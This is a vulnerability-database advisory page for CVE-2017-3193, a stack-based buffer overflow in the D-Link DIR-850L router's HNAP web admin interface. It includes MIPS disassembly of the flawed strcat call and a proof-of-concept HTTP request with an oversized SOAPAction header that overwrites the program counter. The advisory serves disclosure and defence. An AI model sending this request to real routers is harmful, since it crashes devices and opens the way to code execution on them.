Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:92825
HistoryMar 26, 2017 - 12:00 a.m.

D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow (CVE-2017-3193 )

2017-03-2600:00:00
Root
www.seebug.org
33

EPSS

0.003

Percentile

67.7%

JSON

The affected service is the management web, in the cgibin file located within the htdocs folder on the router filesystem. The vulnerability is a Stack-Based Buffer Overflow, caused by a non-controlled use of the strcat() function that allows an overwrite of the PC, and thus the execution flow of the program, allowing arbitrary code execution.The call to strcat that is causing the Buffer Overflow is located at the offset 0x414a20. From the arguments passed to strcat the first (destination) corresponds to the second part of the HNAP_AUTH header, and the second (source) corresponds to the content of the SOAPAction header. If the size of the content of the SOAPAction plus the second part of the HNAP_AUTH header is more than 547 bytes, it will overflow and the following 4 overwritten bytes will correspond tothe stored PC

0x00414130 8f998410 lw t9, -0x7bf0(gp) ;[0x43ad50:4]=0x4251e0 sym.imp.getenv 
0x00414134 0320f809 jalr t9 
0x00414138 24847dac addiu a0, a0, 0x7dac ; HTTP_SOAPACTION 0x0041413c 3c040042 lui a0, 0x42 
0x00414140 8fbc0020 lw gp, 0x20(sp) 
0x00414144 2484615c addiu a0, a0, 0x615c 
0x00414148 8f998410 lw t9, -0x7bf0(gp) ; [0x43ad50:4]=0x4251e0 sym.imp.getenv 
0x0041414c 0320f809 jalr t9 
0x00414150 00408821 move s1, v0 ; HTTP_SOAPACTION saved to s1...
0x00414a14 02402021 move a0, s2 ; arg1 (dest) 
0x00414a18 8fbc0020 lw gp, 0x20(sp) 
0x00414a1c 8f9982b0 lw t9, -0x7d50(gp) ; [0x43abf0:4]=0x4253e0 sym.imp.strcat 
0x00414a20 0320f809 jalr t9 ; Call to strcat 
0x00414a24 02202821 move a1, s1 ; arg2 (src)

The following request is a Proof of Concept that will cause the process to crash, by overwriting the PC with the value 0x41414141. Note that the following is a modification of a legitimate request and that not all the headers are necessary to cause the crash

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8SOAPAction: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAHNAP_AUTH: BBD0605AF8690024AF8568BE88DD7B8E 1482588069X-Requested-With: XMLHttpRequestReferer: http://192.168.0.1/info/Login.htmlContent-Length: 306Cookie: uid=kV8BSOXCocConnection: close

Related

cve 1
prion 1
openvas 1
cvelist 1
nvd 1
cert 1
cve
cve
CVE-2017-3193
2017-12-16 02:29:10
prion
prion
Stack overflow
2017-12-16 02:29:00
openvas
openvas
D-Link DIR-850L 'CVE-2017-3193' Stack-Based Buffer Overflow Vulnerability
2018-03-08 00:00:00
cvelist
cvelist
CVE-2017-3193
2017-12-15 14:00:00
nvd
nvd
CVE-2017-3193
2017-12-16 02:29:10
cert
cert
D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability
2017-03-08 00:00:00

EPSS

0.003

Percentile

67.7%

JSON
Related for SSV:92825
cve1prion1openvas1cvelist1nvd1cert1